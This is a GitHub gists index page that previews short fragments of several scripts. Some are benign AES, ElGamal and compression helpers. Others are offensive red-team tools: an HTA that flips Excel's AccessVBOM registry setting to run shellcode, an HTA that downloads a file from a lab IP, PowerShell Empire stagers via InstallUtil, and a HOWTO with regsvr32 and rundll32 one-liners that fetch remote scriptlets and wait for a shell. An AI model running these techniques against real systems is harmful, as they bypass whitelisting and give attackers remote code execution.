khr0x40sh’s gists

khr0x40sh / PowershellAes.ps1

Created April 6, 2023 17:21 — forked from ctigeek/PowershellAes.ps1

Aes Encryption using powershell.

	function Create-AesManagedObject($key, $IV) {
	$aesManaged = New-Object "System.Security.Cryptography.AesManaged"
	$aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC
	$aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
	$aesManaged.BlockSize = 128
	$aesManaged.KeySize = 256
	if ($IV) {
	if ($IV.getType().Name -eq "String") {
	$aesManaged.IV = [System.Convert]::FromBase64String($IV)
	}

khr0x40sh / psCompress.ps1

Created April 6, 2023 17:16 — forked from marcgeld/psCompress.ps1

Powershell: Compress and decompress byte array

	# Compress and decompress byte array

	function Get-CompressedByteArray {

	[CmdletBinding()]
	Param (
	[Parameter(Mandatory,ValueFromPipeline,ValueFromPipelineByPropertyName)]
	[byte[]] $byteArray = $(Throw("-byteArray is required"))
	)
	Process {

khr0x40sh / mscorlib_load_assembly.vba

Created October 1, 2019 13:28 — forked from monoxgas/mscorlib_load_assembly.vba

VBA code for calling Assembly.Load using raw vtable lookups for the IUnknown

	' Need to add project references to C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscoree.tlb and mscorlib.tlb

	Private Declare PtrSafe Function DispCallFunc Lib "oleaut32.dll" (ByVal pv As LongPtr, ByVal ov As LongPtr, ByVal cc As Integer, ByVal vr As Integer, ByVal ca As Long, ByRef pr As Integer, ByRef pg As LongPtr, ByRef par As Variant) As Long
	Private Declare PtrSafe Sub RtlMoveMemory Lib "kernel32" (Dst As Any, Src As Any, ByVal BLen As LongPtr)
	Private Declare PtrSafe Function VarPtrArray Lib "VBE7" Alias "VarPtr" (ByRef Var() As Any) As LongPtr

	#If Win64 Then
	Const LS As LongPtr = 8&
	#Else
	Const LS As LongPtr = 4&

khr0x40sh / elgamal.ps1

Created April 19, 2016 14:36

ElGamal Encryption in PowerShell

	<#

	ElGamal in PowerShell
	by Casey Smith @subTee


	The key generator works as follows:
	Alice generates an efficient description of a cyclic group G of order q ,with generator g.
	Alice chooses an x randomly from 1 - (q-1)
	Alice computes h = g^x.

khr0x40sh / CalcExcel.hta

Created April 19, 2016 14:35

Shellcode Execution Via HTA

	<html>
	<head>
	<script>
	var objExcel = new ActiveXObject("Excel.Application");
	objExcel.Visible = false;
	var WshShell = new ActiveXObject("WScript.Shell");
	var Application_Version = objExcel.Version;//Auto-Detect Version
	var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM";
	WshShell.RegWrite(strRegPath, 1, "REG_DWORD");
	var objWorkbook = objExcel.Workbooks.Add();

khr0x40sh / InstallUtil.hta

Created April 19, 2016 14:34

Download And Compile

	<html>
	<head>
	<script>

	//Set your settings
	var strFileURL = "http://192.168.56.103/execalc.html";
	var oTest = new ActiveXObject("wscript.shell");
	var pathTest = oTest.ExpandEnvironmentStrings("%USERPROFILE%") + "\\Downloads\\execalc.html";

	var strHDLocation = pathTest;

khr0x40sh / empire.cs

Created April 19, 2016 14:32

PowerShell Empire via InstallUtil.exe

	using System;
	using System.Diagnostics;
	using System.Reflection;
	using System.Configuration.Install;
	using System.Runtime.InteropServices;

	//Add For PowerShell Invocation
	using System.Collections.ObjectModel;
	using System.Management.Automation;
	using System.Management.Automation.Runspaces;

khr0x40sh / HOWTO

Created April 19, 2016 14:32

Fileless Empire Stager

	1. Create Empire Listener
	2. Generate Stager
	3. Host Stager Code At Some URL
	4. Host .sct File At Some URL
	5. On host, execute regsvr32.exe /i:http://server/empire.sct scrobj.dll
	6. Instanitate the Object. ( ex: $s=New-Object -COM "Empire";$s.Exec() )
	-Or This rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();s=new%20ActiveXObject("Empire");s.Exec();
	7. Wait for Shell...

khr0x40sh / Simple DNS server (UDP and TCP) in Python using dnslib.py

Created February 23, 2016 18:42 — forked from andreif/Simple DNS server (UDP and TCP) in Python using dnslib.py